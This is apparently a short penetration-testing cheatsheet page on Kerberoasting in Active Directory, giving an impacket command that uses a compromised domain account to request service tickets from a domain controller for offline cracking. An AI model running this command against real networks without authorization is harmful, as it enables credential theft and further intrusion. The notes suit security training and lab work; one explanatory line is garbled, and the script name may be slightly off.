Kerberoasting

Kerberoasting takes advantage of the way the Kerberos protocol works in Active Directory environments. Read up on it here, here, and here.

Any authenticated member of a domain can take advantage of this attack. To perform the attack, we use the impacket script GetUsersSPNs.py. You can find this on the default Kali by searching in the /usr/doc/python3-impacket/examples/ folder.

python3 GetUsersSPNs.py -request -dc-ip 10.0.0.1 acme.corp/victim_user

10.0.0.1 = The IP of the domain controller
acme.corp = The domain (you will run into issues on this step, it is local for the formal name of the domain, so I can’t just use ACME for example)
victim_user = The user I compromised.

PreviousCME/NXC Cheatsheet NextAS-REP Roasting

Last updated 10 months ago